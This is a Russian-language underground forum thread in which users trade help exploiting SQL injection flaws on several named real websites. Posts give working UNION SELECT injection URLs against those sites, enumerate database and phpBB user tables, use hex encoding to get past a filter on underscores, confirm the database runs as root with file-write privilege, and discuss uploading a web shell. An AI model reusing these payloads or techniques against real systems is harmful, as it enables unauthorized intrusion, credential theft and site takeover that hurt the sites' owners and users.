Ваши вопросы по уязвимостям.

Такую же ошибку(почти) могу вызвать в другом скрипте про limit там вот что:
t.topic_last_post_id DESC LIMIT -30, 30

Line : 273
File : viewforum.php

 

не по сабжу

инжект в лимит ВОЗМОЖЕН, много раз уже упоминалось.

 

Только не после ордера

 

Значит инъекция не возможна?Щас толька ссылка была недавно уже нет!Толи автор удалил свой пост толи мне выспаться нужно!Если автор удалил можешь дать почитать?

 

Qam Инъекция в лимите после ORDER BY невозможна, я думал ответ на твой вопрос дан

 

2 Qam

 

Уважаемые всеведущие гуру андеграундного мира,позвольте обратиться к вам с простым но ацки актуальным вопросом,что делать,если фильтруется "_" а все таблички с префиксом?)

 

Боюсь отвечать на Ваш вопрос , во избежании причисления меня к "всеведущим гуру андеграундного мира"

По теме: дать ссылку

 

http://www.rncb.ru/print_view.php?id=450&fpath=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+

 

используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь

Code:

SELECT HEX('tablename')

и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337D

 

помогите разобраться!
вот раскрутил скулу:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+information_schema.tables/**/
хочу залить shell через форум!
http://15rus.ru/forum/

Не могу понять где здесь таблицы форума???

 

По форуму видно, что это phpbb. Какая версия я хз, с этим форумом мало знаком. Вот 3 таблицы:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+information_schema.tables+where+table_name+like+0x257068706262257573657273--
какая-то из них нужная.
зы: админы того сайта просто ппц - кучу софта понаставили, помойка просто)

 

или же просто используете php функцию =)

echo "0x".bin2hex("что надо захекстить");

 

1. Есть туча сайтов, которые хексят.
2. Вы вообще ссылку смотрели?
3. Есть табла mysql.user.. но...

 

MirA
Забавно, действительно фильтрация "_"
Есть очень большая вероятность того, что user под которым работает база, file_priv=Y
http://www.rncb.ru/print_view.php?id=450&fpath=-2+union+select+1,2,3,UNHEX(HEX(user())),5,6,7,8,9,10,11,12,13+from+mysql.user+--+
root@localhost

Прочитать файлы мы не сможем, т.к LOAD_FILE, и посмотреть тоже , т.к file_priv, а вот записать ...

Тоесть ищем папку на запись, и пробуем

PS
prescott,wildshaman Зачем вообще это писать?

 

Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2)
з.ы. в гугл не посылать,парсил)

 

"Errcode 2" означает, что папка не существует.

Путь сам что-ли придумывал? ^^

 

нет прав на запись или путь не правильный

 

Нет прав - это "Errcode: 13"

 

Помогите пожалуйста разобраться, вот нашел иньекцию http://www.rfrap.ru/site/index.php?p=16;'
при попытке подобрать количество полей вылезает

подозреваю, что это 3 версия мускуля и похоже blind SQL-injection, а так вообще хз, просто я никогда не встречался с этим....